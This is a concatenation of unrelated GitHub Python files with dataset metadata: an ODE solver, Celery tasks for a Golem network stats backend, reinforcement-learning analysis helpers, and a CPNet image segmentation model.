k3 = f(t + 0.5*h, y + 0.5*h*k2)
k4 = f(t + h, y + h*k3)
y = y + h*(k1 + 2*k2 + 2*k3 + k4)/6
t = t + h
ans.append([t, y])
return ans
def adam_bashforth_by_method(self, order, method):
if method == 'euler':
ans = self.euler()
elif method == 'inverse euler':
ans = self.inverse_euler()
elif method == 'improved euler':
ans = self.improved_euler()
elif method == 'runge kutta':
ans = self.runge_kutta()
elif method == 'list':
ans = self.inital_points
h, f = self.h, self.f
for i in range(order, self.nsteps+1):
if len(ans) == i:
ans.append([0, 0])
ans[i][1] = self.get_ab(ans, i, order)
ans[i][0] = ans[i-1][0] + h
return ans
def get_am(self, ans, idx, order):
value = ans[idx-1][1]
ans[idx][1] = self.get_ab(ans, idx, order)
ans[idx][0] = ans[idx-1][0] + self.h
for i in range(0, order+1):
value += self.h*self.coef_am[order][i]*self.f(ans[idx-i][0], ans[idx-i][1])
return value
def adam_multon_by_method(self, order, method):
if method == 'euler':
ans = self.euler()
elif method == 'inverse euler':
ans = self.inverse_euler()
elif method == 'improved euler':
ans = self.improved_euler()
elif method == 'runge kutta':
ans = self.runge_kutta()
elif method == 'list':
ans = self.inital_points
h, f = self.h, self.f
for i in range(order, self.nsteps+1):
if len(ans) == i:
ans.append([0, 0])
ans[i][1] = self.get_am(ans, i, order)
ans[i][0] = ans[i-1][0] + h
return ans
def get_inv(self, ans, idx, order):
ans[idx][1] = self.get_ab(ans, idx, order)
ans[idx][0] = ans[idx-1][0] + self.h
value = self.coef_inv[order][0]*self.h*self.f(ans[idx][0], ans[idx][1])
for i in range (1, order+1):
value += self.coef_inv[order][i]*ans[idx-i][1]
return value
def backward_diff(self, order, method):
if method == 'euler':
ans = self.euler()
elif method == 'inverse euler':
ans = self.inverse_euler()
elif method == 'improved euler':
ans = self.improved_euler()
elif method == 'runge kutta':
ans = self.runge_kutta()
elif method == 'list':
ans = self.inital_points
h, f = self.h, self.f
for i in range(order, self.nsteps+1):
if len(ans) == i:
ans.append([0, 0])
ans[i][1] = self.get_inv(ans, i, order)
ans[i][0] = ans[i-1][0] + h
return ans
#Main part of the code
#We wish to find an approximate solution to the equation dy/dt = f(t, y)
f = open("in.txt")
for line in f:
entrada = line.split()
method = entrada[0]
ini_pts = []
if method == 'adam_bashforth' or method == 'adam_multon' or method == 'formula_inversa':
order = int(entrada[-1])
expr = sympify(entrada[-2])
t, y = symbols("t y")
f = lambdify((t, y), expr, "numpy")
nsteps = int(entrada[-3])
h = float(entrada[-4])
t0, y0 = float(entrada[-5]), 0
for i in range(1, 1 + order):
ini_pts.append([t0 + (i-1)*h, float(entrada[i])])
else:
y0, t0 = float(entrada[1]), float(entrada[2])
h = float(entrada[3])
nsteps = int(entrada[4])
expr = sympify(entrada[5])
t, y = symbols("t y")
f = lambdify((t, y), expr, "numpy")
solver = Solver(f, t0, y0, h, nsteps, ini_pts)
pts = []
if method == "euler":
pts = solver.euler()
print("Metodo de Euler")
elif method == "euler_inverso":
pts = solver.inverse_euler()
print("Metodo de Euler Inverso")
elif method == "euler_aprimorado":
pts = solver.improved_euler()
print("Metodo de Euler Aprimorado")
elif method == "runge_kutta":
pts = solver.runge_kutta()
print("Metodo de Runge-Kutta")
elif method == "adam_bashforth_by_euler":
order = int(entrada[6])
print("Metodo de Adam-Bashforth por Euler")
pts = solver.adam_bashforth_by_method(order, 'euler')
elif method == 'adam_bashforth_by_euler_inverso':
order = int(entrada[6])
print("Metodo de Adam-Bashforth por Euler Inverso")
pts = solver.adam_bashforth_by_method(order, 'inverse euler')
elif method == 'adam_bashforth_by_euler_aprimorado':
order = int(entrada[6])
print("Metodo de Adam-Bashforth por Euler Aprimorado")
pts = solver.adam_bashforth_by_method(order, 'improved euler')
elif method == 'adam_bashforth_by_runge_kutta':
order = int(entrada[6])
print("Metodo de Adam-Bashforth por Runge Kutta")
pts = solver.adam_bashforth_by_method(order, 'runge kutta')
elif method == 'adam_bashforth':
print("Metodo de Adam-Bashforth")
pts = solver.adam_bashforth_by_method(order, 'list')
elif method == 'adam_multon':
print("Metodo de Adam-Multon")
pts = solver.adam_multon_by_method(order-1, 'list')
elif method == 'adam_multon_by_euler':
order = int(entrada[6])
print("Metodo de Adam-Multon por Euler")
pts = solver.adam_multon_by_method(order-1, 'euler')
elif method == 'adam_multon_by_euler_inverso':
order = int(entrada[6])
print("Metodo de Adam-Multon por Euler Inverso")
pts = solver.adam_multon_by_method(order-1, 'inverse euler')
elif method == 'adam_multon_by_euler_aprimorado':
order = int(entrada[6])
print("Metodo de Adam-Multon por Euler Aprimorado")
pts = solver.adam_multon_by_method(order-1, 'improved euler')
elif method == 'adam_multon_by_runge_kutta':
order = int(entrada[6])
print("Metodo de Adam-Multon por Runge Kutta")
pts = solver.adam_multon_by_method(order-1, 'runge kutta')
elif method == 'formula_inversa':
print("Metodo Formula Inversa de Diferenciacao")
pts = solver.backward_diff(order-1, 'list')
elif method == 'formula_inversa_by_euler':
order = int(entrada[6])
print("Metodo Formula Inversa de Diferenciacao por Euler")
pts = solver.backward_diff(order-1, 'euler')
elif method == 'formula_inversa_by_euler_inverso':
order = int(entrada[6])
print("Metodo Formula Inversa de Diferenciacao por Euler Inverso")
pts = solver.backward_diff(order-1, 'inverse euler')
elif method == 'formula_inversa_by_euler_aprimorado':
order = int(entrada[6])
print("Metodo Formula Inversa de Diferenciacao por Euler Aprimorado")
pts = solver.backward_diff(order-1, 'improved euler')
elif method == 'formula_inversa_by_runge_kutta':
order = int(entrada[6])
print("Metodo Formula Inversa de Diferenciacao por Runge Kutta")
pts = solver.backward_diff(order-1, 'runge kutta')
print("y(%.2f) = %.2f" %(pts[0][0], pts[0][1]))
print("h = %.2f" %h)
i = 0
for [x, y] in pts:
print("%d %.10lf" %(i, y))
i += 1
######################### ploting the solution #############################
####### comment the folowing lines to not plot solution ######
toplot = np.array(pts)
plt.plot(toplot[:, 0], toplot[:, 1], ls = '-', color = 'black', linewidth = 1)
plt.show()
#################################################################################
print("\n")
| vserraa/Numerical-Methods | solver.py | solver.py | py | 9,570 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 292,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 293,
"usage_type": "name"
},
{
"api_name": "matplotlib.py... |
10017544829 | from core.celery import app
from celery import Celery
import json
import subprocess
import os
from .models import Node, Offer
from django.utils import timezone
import tempfile
import redis
from .serializers import NodeSerializer, OfferSerializer
import calendar
import datetime
import requests
from api.serializers import FlatNodeSerializer
from collector.models import Node as NodeV1
pool = redis.ConnectionPool(host='redis', port=6379, db=0)
r = redis.Redis(connection_pool=pool)
@ app.task
def v2_network_online_to_redis():
data = Node.objects.filter(online=True)
serializer = NodeSerializer(data, many=True)
test = json.dumps(serializer.data, default=str)
r.set("v2_online", test)
@app.task
def v2_network_online_to_redis_flatmap():
data = NodeV1.objects.filter(online=True)
serializer = FlatNodeSerializer(data, many=True)
test = json.dumps(serializer.data)
r.set("v2_online_flatmap", test)
@ app.task
def v2_cheapest_offer():
recently = timezone.now() - timezone.timedelta(minutes=5)
data = Offer.objects.filter(runtime="vm",
updated_at__range=(recently, timezone.now())).order_by('-monthly_price_glm')
serializer = OfferSerializer(data, many=True)
sorted_data = json.dumps(serializer.data, default=str)
r.set("v2_cheapest_offer", sorted_data)
@ app.task
def latest_blog_posts():
req = requests.get(
f"https://blog.golemproject.net/ghost/api/v3/content/posts/?key={os.environ.get('BLOG_API_KEY')}&include=tags,authors&limit=3")
data = json.dumps(req.json())
r.set("v2_index_blog_posts", data)
@ app.task
def v2_cheapest_provider():
req = requests.get(
"https://api.coingecko.com/api/v3/coins/ethereum/contract/0x7DD9c5Cba05E151C895FDe1CF355C9A1D5DA6429")
data = req.json()
price = data['market_data']['current_price']['usd']
obj = Offer.objects.filter(
runtime="vm", provider__online=True).order_by("monthly_price_glm")
serializer = OfferSerializer(obj, many=True)
mainnet_providers = []
for index, provider in enumerate(serializer.data):
if "golem.com.payment.platform.erc20-mainnet-glm.address" in provider['properties']:
mainnet_providers.append(provider)
sorted_pricing_and_specs = sorted(mainnet_providers, key=lambda element: (
float(element['properties']['golem.inf.cpu.threads']), float(element['monthly_price_glm'])))
two_cores = [{'name': 'Digital Ocean', 'img': '/do-logo.svg',
'usd_monthly': '15', 'bandwidth': '3', 'cores': 2, 'memory': '1', 'disk': "25", "glm": float(price) * 15}, {'name': 'Amazon Web Services', 'img': '/aws-logo.svg',
'usd_monthly': '15.23', 'bandwidth': 'Unlimited', 'cores': 2, 'memory': '1', 'disk': "25", "glm": float(price) * 15.23}, {'name': 'Google Cloud Platform', 'img': '/gcp-logo.svg',
'usd_monthly': '10.37', 'bandwidth': 'Unlimited', 'cores': 2, 'memory': '1', 'disk': "25", "glm": float(price) * 10.37}, {'name': 'Azure', 'img': '/azure-logo.svg',
'usd_monthly': '15.11', 'bandwidth': '6', 'cores': 2, 'memory': '1', 'disk': "25", "glm": float(price) * 15.11}, ]
eight_cores = [{'name': 'Digital Ocean', 'img': '/do-logo.svg',
'usd_monthly': '80', 'bandwidth': '6', 'cores': 8, 'memory': '16', 'disk': "320", "glm": float(price) * 80}, {'name': 'Amazon Web Services', 'img': '/aws-logo.svg',
'usd_monthly': '121.81', 'bandwidth': 'Unlimited', 'cores': 8, 'memory': '16', 'disk': "320", "glm": float(price) * 121.81}, {'name': 'Google Cloud Platform', 'img': '/gcp-logo.svg',
'usd_monthly': '208.47', 'bandwidth': 'Unlimited', 'cores': 8, 'memory': '32', 'disk': "320", "glm": float(price) * 208.47}, {'name': 'Azure', 'img': '/azure-logo.svg',
'usd_monthly': '121.18', 'cores': 8, 'memory': '16', 'bandwidth': '6', 'disk': "320", "glm": float(price) * 121.18}]
thirtytwo_cores = [{'name': 'Digital Ocean', 'img': '/do-logo.svg',
'usd_monthly': '640', 'bandwidth': '9', 'cores': 32, 'memory': '64', 'disk': "400", "glm": float(price) * 640}, {'name': 'Amazon Web Services', 'img': '/aws-logo.svg',
'usd_monthly': '834.24', 'bandwidth': 'Unlimited', 'cores': 32, 'memory': '64', 'disk': "400", "glm": float(price) * 834.24}, {'name': 'Google Cloud Platform', 'img': '/gcp-logo.svg',
'usd_monthly': '746.04', 'bandwidth': 'Unlimited', 'cores': 32, 'memory': '64', 'disk': "400", "glm": float(price) * 746.04}, {'name': 'Azure', 'img': '/azure-logo.svg',
'usd_monthly': '1310.13', 'bandwidth': '1', 'cores': 32, 'memory': '64', 'disk': "256", "glm": float(price) * 1310.13}, ]
sixtyfour_cores = [{'name': 'Digital Ocean', 'img': '/do-logo.svg',
'usd_monthly': '1200', 'bandwidth': '9', 'cores': 40, 'memory': '160', 'disk': "500", "glm": float(price) * 1200}, {'name': 'Amazon Web Services', 'img': '/aws-logo.svg',
'usd_monthly': '1638.48', 'bandwidth': 'Unlimited', 'cores': 64, 'memory': '64', 'disk': "500", "glm": float(price) * 1638.48}, {'name': 'Google Cloud Platform', 'img': '/gcp-logo.svg',
'usd_monthly': '1914.62', 'bandwidth': 'Unlimited', 'cores': 60, 'memory': '240', 'disk': "500", "glm": float(price) * 1914.62}, {'name': 'Azure', 'img': '/azure-logo.svg',
'usd_monthly': '2688.37', 'bandwidth': '1', 'cores': 64, 'memory': '256', 'disk': "512", "glm": float(price) * 2688.37}, ]
for obj in sorted_pricing_and_specs:
provider = {}
provider['name'] = "Golem Network"
provider['node_id'] = obj['properties']['id']
provider['img'] = "/golem.png"
provider['usd_monthly'] = float(
price) * float(obj['monthly_price_glm'])
provider['cores'] = float(
obj['properties']['golem.inf.cpu.threads'])
provider['memory'] = float(obj['properties']['golem.inf.mem.gib'])
provider['bandwidth'] = "Unlimited"
provider['disk'] = float(
obj['properties']['golem.inf.storage.gib'])
provider['glm'] = float(obj['monthly_price_glm'])
if float(obj['properties']['golem.inf.cpu.threads']) == 2 and len(two_cores) == 4:
two_cores.append(provider)
elif float(obj['properties']['golem.inf.cpu.threads']) >= 2 and len(two_cores) == 4:
two_cores.append(provider)
if float(obj['properties']['golem.inf.cpu.threads']) == 8 and len(eight_cores) == 4:
eight_cores.append(provider)
elif float(obj['properties']['golem.inf.cpu.threads']) >= 8 and len(eight_cores) == 4:
eight_cores.append(provider)
if float(obj['properties']['golem.inf.cpu.threads']) == 32 and len(thirtytwo_cores) == 4:
thirtytwo_cores.append(provider)
elif float(obj['properties']['golem.inf.cpu.threads']) >= 32 and len(thirtytwo_cores) == 4:
thirtytwo_cores.append(provider)
if float(obj['properties']['golem.inf.cpu.threads']) == 64 and len(sixtyfour_cores) == 4:
sixtyfour_cores.append(provider)
elif float(obj['properties']['golem.inf.cpu.threads']) >= 64 and len(sixtyfour_cores) == 4:
sixtyfour_cores.append(provider)
sorted_two = sorted(two_cores, key=lambda element: (
float(element['usd_monthly'])))
sorted_eight = sorted(eight_cores, key=lambda element: (
float(element['usd_monthly'])))
sorted_thirtytwo = sorted(thirtytwo_cores, key=lambda element: (
float(element['usd_monthly'])))
sorted_sixtyfour = sorted(sixtyfour_cores, key=lambda element: (
float(element['usd_monthly'])))
data = json.dumps({'2': sorted_two, '8': sorted_eight,
'32': sorted_thirtytwo, '64': sorted_sixtyfour})
r.set("v2_cheapest_provider", data)
@ app.task
def v2_offer_scraper():
os.chdir("/stats-backend/yapapi/examples/low-level-api/v2")
with open('data.config') as f:
for line in f:
command = line
proc = subprocess.Popen(command, shell=True)
proc.wait()
content = r.get("offers_v2")
serialized = json.loads(content)
now = datetime.datetime.now()
days_in_current_month = calendar.monthrange(
now.year, now.month)[1]
seconds_current_month = days_in_current_month*24*60*60
for line in serialized:
data = json.loads(line)
provider = data['id']
wallet = data['wallet']
obj, created = Node.objects.get_or_create(node_id=provider)
if created:
offerobj = Offer.objects.create(properties=data, provider=obj,
runtime=data['golem.runtime.name'])
if data['golem.runtime.name'] == 'vm':
vectors = {}
for key, value in enumerate(data['golem.com.usage.vector']):
vectors[value] = key
monthly_pricing = (data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.duration_sec']] * seconds_current_month) + (
data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.cpu_sec']] * seconds_current_month * data['golem.inf.cpu.cores']) + data['golem.com.pricing.model.linear.coeffs'][-1]
offerobj.monthly_price_glm = monthly_pricing
offerobj.save()
obj.wallet = wallet
obj.online = True
obj.save()
else:
offerobj, offercreated = Offer.objects.get_or_create(
provider=obj, runtime=data['golem.runtime.name'])
if data['golem.runtime.name'] == 'vm':
vectors = {}
for key, value in enumerate(data['golem.com.usage.vector']):
vectors[value] = key
monthly_pricing = (data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.duration_sec']] * seconds_current_month) + (
data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.cpu_sec']] * seconds_current_month * data['golem.inf.cpu.cores']) + data['golem.com.pricing.model.linear.coeffs'][-1]
offerobj.monthly_price_glm = monthly_pricing
offerobj.save()
offerobj.properties = data
offerobj.save()
obj.runtime = data['golem.runtime.name']
obj.wallet = wallet
obj.online = True
obj.save()
# Find offline providers
str1 = ''.join(serialized)
fd, path = tempfile.mkstemp()
try:
with os.fdopen(fd, 'w') as tmp:
# do stuff with temp file
tmp.write(str1)
online_nodes = Node.objects.filter(online=True)
for node in online_nodes:
if not node.node_id in str1:
node.online = False
node.computing_now = False
node.save(update_fields=[
'online', 'computing_now'])
finally:
os.remove(path)
@ app.task
def v2_offer_scraper_hybrid_testnet():
os.chdir("/stats-backend/yapapi/examples/low-level-api/hybrid")
proc = subprocess.Popen(
'export YAGNA_APPKEY=$(yagna app-key list --json | jq -r .[0].key) && python3 list-offers-testnet.py', shell=True)
proc.wait()
content = r.get("v2_offers_hybrid_testnet")
serialized = json.loads(content)
now = datetime.datetime.now()
days_in_current_month = calendar.monthrange(
now.year, now.month)[1]
seconds_current_month = days_in_current_month*24*60*60
nodes_to_create = []
nodes_to_update = []
offers_to_create = []
offer_to_update = []
offline_nodes = set(Node.objects.filter(
online=True).values_list('node_id', flat=True))
for line in serialized:
data = json.loads(line)
provider = data['id']
wallet = data['wallet']
obj, created = Node.objects.get_or_create(node_id=provider)
if created:
if data['golem.runtime.name'] == 'vm':
vectors = {}
for key, value in enumerate(data['golem.com.usage.vector']):
vectors[value] = key
monthly_pricing = (data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.duration_sec']] * seconds_current_month) + (
data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.cpu_sec']] * seconds_current_month * data['golem.inf.cpu.cores']) + data['golem.com.pricing.model.linear.coeffs'][-1]
offers_to_create.append(
Offer(properties=data, provider=obj, runtime=data['golem.runtime.name'], monthly_price_glm=monthly_pricing))
offers_to_create.append(
Offer(properties=data, provider=obj, runtime=data['golem.runtime.name']))
nodeobj = Node(node_id=provider, wallet=wallet, online=True)
nodes_to_create.append(
nodeobj)
else:
offerobj, offercreated = Offer.objects.get_or_create(
provider=obj, runtime=data['golem.runtime.name'])
if data['golem.runtime.name'] == 'vm':
vectors = {}
for key, value in enumerate(data['golem.com.usage.vector']):
vectors[value] = key
monthly_pricing = (data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.duration_sec']] * seconds_current_month) + (
data['golem.com.pricing.model.linear.coeffs'][vectors['golem.usage.cpu_sec']] * seconds_current_month * data['golem.inf.cpu.cores']) + data['golem.com.pricing.model.linear.coeffs'][-1]
offerobj.monthly_price_glm = monthly_pricing
offerobj.properties = data
offerobj.runtime = data['golem.runtime.name']
if offercreated:
offers_to_create.append(offerobj)
else:
offer_to_update.append(offerobj)
obj.wallet = wallet
obj.online = True
obj.updated_at = timezone.now()
nodes_to_update.append(obj)
if provider in offline_nodes:
offline_nodes.remove(provider)
Node.objects.bulk_create(nodes_to_create)
Node.objects.bulk_update(nodes_to_update, fields=[
'wallet', 'online', 'updated_at', ])
Offer.objects.bulk_create(offers_to_create)
Offer.objects.bulk_update(offer_to_update, fields=[
'properties', 'monthly_price_glm'])
# mark offline nodes as offline
Node.objects.filter(node_id__in=offline_nodes, online=True).update(
online=False, computing_now=False, updated_at=timezone.now())
| golemfactory/golem-stats-backend | stats-backend/api2/tasks.py | tasks.py | py | 17,630 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "redis.ConnectionPool",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "redis.Redis",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "models.Node.objects.filter",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "models.No... |
18045830902 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
def get_reward_curve(agents):
"""
Extract rewards from list of agents used in training
:param agents: list of agents used in training
:return: array of rewards
"""
return np.array([agent.reward_total for agent in agents])
def choose_best(agents):
"""
Find episode with higest reward value
:param agents: list of agents used in training
:return: agent with highest reward
"""
rewards = get_reward_curve(agents)
return agents[np.argmax(rewards)]
def moving_average(v, n):
"""
Calculate a moving average (can be improved)
:param v: vector of values
:param n: number of samples across which to calculate average
:return:
"""
return np.convolve(v, np.ones(n)/n, 'valid'), np.array(range(n, len(v)+1))
def plot_average_reward_curve(agents, n=50):
"""
Plot moving averge of a reward curve
:param agents: list of agents corresponding to episodes
:param n: number of samples across which to calculate average
:return:
"""
rewards = get_reward_curve(agents)
mov_ave, episodes = moving_average(rewards, n=n)
plt.figure()
plt.plot(episodes, mov_ave)
plt.xlabel('Episode')
plt.ylabel('Average Reward for Last {:d} Episodes'.format(n))
plt.show()
def run_network(initial_state, env, model):
"""
Deterministically run a network after training to analyze performance
:param initial_state: initial state of agent
:param env: RL environment used for training
:param model: RL model generated by training
:return:
"""
done = False
obs = env.reset(initial_state=initial_state)
while not done:
action, _state = model.predict(obs, deterministic=True)
obs, _, done, __ = env.step(action)
env.agent.plot_state_history(style='segmented')
def run_network_for_shap(env, model, num_trials=100):
"""
Run network after training to analyze with SHAP
:param env: RL environment used for training
:param model: RL model generated by training
:param num_trials: number of trajectories to generate
:return:
"""
obs_list = []
act_list = []
done_list = []
rew_list = []
for trial in range(num_trials):
done = False
obs = env.reset()
while not done:
action, _state = model.predict(obs, deterministic=True)
obs_list.append(obs)
act_list.append(action)
obs, rew, done, __ = env.step(action)
rew_list.append(rew)
done_list.append(done)
return obs_list, act_list, rew_list, done_list
def run_network_stochastic(model, env, num_eps):
"""
Stochastically run a network after training to analyze performance
:param num_eps: number of episodes to use
:param env: RL environment used for training
:param model: RL model generated by training
:return:
"""
success_count = 0 # number of episodes within fpa tolerence and that reach target alt
terminal_alt = []
terminal_fpa = []
terminal_time = []
terminal_vel = []
for x in range(0, num_eps):
obs = env.reset()
done = False
while not done:
action, _states = model.predict(obs, deterministic=False)
obs, rewards, done, info = env.step(action)
if done:
terminal_time.append(obs[0])
terminal_alt.append(obs[1])
terminal_vel.append(obs[2])
terminal_fpa.append(obs[3] * 180 / np.pi)
if env.agent.success:
success_count += 1
success_percentage = success_count / num_eps
print("success percentage ", success_percentage)
# TODO make this into a function for post processing
num_bins = 20
counts_t, bins_t = np.histogram(terminal_time, bins=num_bins)
counts_alt, bins_alt = np.histogram(terminal_alt, bins=num_bins)
counts_vel, bins_vel = np.histogram(terminal_vel, bins=num_bins)
counts_fpa, bins_fpa = np.histogram(terminal_fpa, bins=num_bins)
fig, axs = plt.subplots(2, 2)
axs[0, 0].hist(bins_t[:-1], bins_t, weights=counts_t)
axs[0, 0].set_title('Final Time (s)')
axs[0, 1].hist(bins_alt[:-1], bins_alt, weights=counts_alt)
axs[0, 1].set_title('Terminal Alt (m)')
axs[1, 0].hist(bins_vel[:-1], bins_vel, weights=counts_vel)
axs[1, 0].set_title('Terminal Vel (m/s)')
axs[1, 1].hist(bins_fpa[:-1], bins_fpa, weights=counts_fpa)
axs[1, 1].set_title('Terminal FPA (deg)')
fig.tight_layout()
plt.show()
def run_network_save(initial_state, env, model, file = None, dir = None):
"""
Deterministically run a network after training and save run data to npy file
:param initial_state: initial state of agent
:param env: RL environment used for training
:param model: RL model generated by training
:param file: filename for text file which contains trajectory, time, and control data
:param dir: folder directory which contains saved run data
:return:
"""
done = False
obs = env.reset(initial_state=initial_state)
while not done:
action, _state = model.predict(obs, deterministic=True)
obs, _, done, __ = env.step(action)
env.agent.save_run_data(file = file, save = initial_state, dir = dir)
def run_network_control(initial_state, env, model, save = None):
"""
Deterministically run a network after training and plot control history and trajectory
:param initial_state: initial state of agent
:param env: RL environment used for training
:param model: RL model generated by training
:return:
"""
done = False
obs = env.reset(initial_state=initial_state)
while not done:
action, _state = model.predict(obs, deterministic=True)
obs, _, done, __ = env.step(action)
env.agent.plot_control(style='segmented', save =save)
def network_excel(initial_state, env, model, filename):
"""
Save run data to an excel file
:param initial_state: initial state of agent
:param env: RL environment used for training
:param model: RL model generated by training
:param filename: name of the excel file to be saved
:return:
"""
obs0 = []
obs1 = []
obs2 = []
obs3 = []
rewards = []
dones = []
actions = []
done = False
obs = env.reset(initial_state=initial_state)
reward = 0.
obs0.append(obs[0])
obs1.append(obs[1])
obs2.append(obs[2])
obs3.append(obs[3])
dones.append(done)
rewards.append(reward)
while not done:
action, _state = model.predict(obs, deterministic=True)
obs, _, done, __ = env.step(action)
actions.append(action)
obs0.append(obs[0])
obs1.append(obs[1])
obs2.append(obs[2])
obs3.append(obs[3])
dones.append(done)
rewards.append(reward)
d = {'Time': obs0, 'Altitude': obs1, 'Velocity': obs2, 'FPA': obs3, 'reward': rewards, 'done': dones}
df = pd.DataFrame(data=d)
Xy = df[df['done'] == False]
Xy = Xy[['Time', 'Altitude', 'Velocity', 'FPA']]
Xy['Action'] = actions
Xy.to_csv(filename+'.csv')
def run_network_success(initial_state, env, model):
"""
Deterministically run a network after training to analyze performance
:param initial_state: initial state of agent
:param env: RL environment used for training
:param model: RL model generated by training
:return:
"""
success = False
ctr = 0
done = False
obs = env.reset(initial_state=initial_state)
while not done:
action, _state = model.predict(obs, deterministic=True)
obs, _, done, __ = env.step(action)
if done == True:
if obs[0] <= 3000 & abs(obs[3]) * ((180 / np.pi) <= 0.25 * np.pi / 180):
success = False
else:
success = True
return success
| hmdmia/HighSpeedRL | backend/utils/analysis.py | analysis.py | py | 7,951 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.argmax",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.convolve",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number... |
10525922454 | import copy
import torch
import torch.nn as nn
from .backbone import *
import numpy as np
import torch.nn.functional as F
import thop
def ConvBNReLU(in_chann, out_chann, ks, st, p=1):
return nn.Sequential(
nn.Conv2d(in_chann, out_chann, kernel_size=ks, stride=st, padding=p, bias=False),
nn.BatchNorm2d(out_chann),
nn.ReLU(inplace=True)
)
class Aggregation(nn.Module):
def __init__(self, in_chann, out_chann, asy_ks=5):
super(Aggregation, self).__init__()
self.conv = ConvBNReLU(in_chann, out_chann, 3, 1, 1)
self.left_asymmetric = nn.Sequential(
nn.Conv2d(out_chann, out_chann, kernel_size=(1, asy_ks), stride=1, \
padding=(0, asy_ks//2), groups=out_chann, bias=True),
nn.Conv2d(out_chann, out_chann, kernel_size=(asy_ks, 1), stride=1, \
padding=(asy_ks//2, 0), groups=out_chann, bias=True),
)
self.right_asymmetric = nn.Sequential(
nn.Conv2d(out_chann, out_chann, kernel_size=(asy_ks, 1), stride=1, \
padding=(asy_ks//2, 0), groups=out_chann, bias=True),
nn.Conv2d(out_chann, out_chann, kernel_size=(1, asy_ks), stride=1, \
padding=(0, asy_ks//2), groups=out_chann, bias=True),
)
self.bn_relu = nn.Sequential(
nn.BatchNorm2d(out_chann),
nn.ReLU(inplace=True)
)
def forward(self, x):
x = self.conv(x)
left = self.left_asymmetric(x)
right = self.right_asymmetric(x)
out = left + right
out = self.bn_relu(out)
return out
class DeepLabHead(nn.Module):
def __init__(self, num_classes, last_channels, mid_channels, low_channels):
super(DeepLabHead, self).__init__()
self.low_process = ConvBNReLU(low_channels, 48, 1, 1, 0)
self.mid_process = ConvBNReLU(mid_channels, 48, 1, 1, 0)
self.mid_project = ConvBNReLU(304, 256, 3, 1, 1)
self.classifier = nn.Sequential(
ConvBNReLU(304, 256, 3, 1, 1),
nn.Dropout(0.1),
nn.Conv2d(256, num_classes,
kernel_size=1,
stride=1,
padding=0,
bias=True)
)
def forward(self, last_feat, mid_feat, low_feat):
low_feat = self.low_process(low_feat)
mid_feat = self.mid_process(mid_feat)
last_feat = F.interpolate(last_feat, size=mid_feat.size()[2:], mode="bilinear", align_corners=True)
mid_feat = torch.cat([last_feat, mid_feat], dim=1)
mid_feat = self.mid_project(mid_feat)
mid_feat = F.interpolate(mid_feat, size=low_feat.size()[2:], mode="bilinear", align_corners=True)
out_feat = torch.cat([mid_feat, low_feat], dim=1)
out = self.classifier(out_feat)
return out
class CPNet(nn.Module):
def __init__(self, num_classes, input_channels=512,
prior_channels=512, prior_size=(40, 40), backend="resnet34", pretrained=True):
super(CPNet, self).__init__()
self.prior_size = np.prod(prior_size)
self.num_classes = num_classes
self.prior_channels = prior_channels
self.backbone = eval(backend)(pretrained=pretrained) # backbone
self.aggregation = Aggregation(input_channels, prior_channels, 11) # 特征聚合,丰富特征的上下文信息
self.prior_conv = nn.Sequential(
nn.Conv2d(prior_channels, self.prior_size, kernel_size=1, stride=1, bias=True),
# nn.BatchNorm2d(self.prior_size)
)
self.intra_conv = ConvBNReLU(prior_channels, prior_channels, 1, 1, 0)
self.inter_conv = ConvBNReLU(prior_channels, prior_channels, 1, 1, 0)
self.post_process = nn.Sequential(
ConvBNReLU(input_channels + prior_channels*2, 256, 1, 1, 0),
ConvBNReLU(256, 256, 3, 1, 1) # prior_channels
)
# without deeplab
self.head = nn.Sequential(
ConvBNReLU(256, 256, 3, 1, 1), # prior_channels
nn.Dropout(0.1),
nn.Conv2d(256, num_classes, 1, 1, bias=True)
)
# with deeplab
'''self.deeplab_head = DeepLabHead(num_classes, 256, 128, 64)'''
def _reinit(self, input_size):
input_size = input_size/16
self.prior_size = int(np.prod(input_size))
self.prior_conv = nn.Sequential(
nn.Conv2d(self.prior_channels, self.prior_size, kernel_size=1, stride=1, bias=True),
)
def forward(self, x):
feat, feat_2, feat_1 = self.backbone(x)
h, w = feat.size()[2:]
value = self.aggregation(feat)
context_proir_map = self.prior_conv(value)
context_proir_map = context_proir_map.view(context_proir_map.size()[0], \
-1, self.prior_size).permute(0, 2, 1)
intra_context_proir_map = torch.sigmoid(context_proir_map) # [bs, 40*40, 40*40], 类内
inter_context_prior_map = 1 - context_proir_map # 类间
value = value.view(value.size()[0], value.size()[1], -1).permute(0, 2, 1).contiguous() # [bs, 512, 40*40]==>[bs, 40*40, 512]
intra_context_proir_map = F.softmax(intra_context_proir_map, dim=-1)
intra_context = torch.matmul(intra_context_proir_map, value) # [bs, 40*40, 512] # 利用类内全局特征更新每一个特征
# intra_context = intra_context.div(self.prior_size)
intra_context = intra_context.permute(0, 2, 1).contiguous()
intra_context = intra_context.view(intra_context.size(0), self.prior_channels, h, w)
intra_context = self.intra_conv(intra_context)
inter_context_prior_map = F.softmax(inter_context_prior_map, dim=-1)
inter_context = torch.matmul(inter_context_prior_map, value)
# inter_context = inter_context.div(self.prior_size)
inter_context = inter_context.permute(0, 2, 1).contiguous()
inter_context = inter_context.view(inter_context.size(0), self.prior_channels, h, w)
inter_context = self.inter_conv(inter_context)
out = torch.cat([feat, intra_context, inter_context], dim=1)
out = self.post_process(out)
# without deeplab
seg_out = self.head(out)
seg_out = F.interpolate(seg_out, size=(x.size()[2], x.size()[3]), mode="bilinear", align_corners=True)
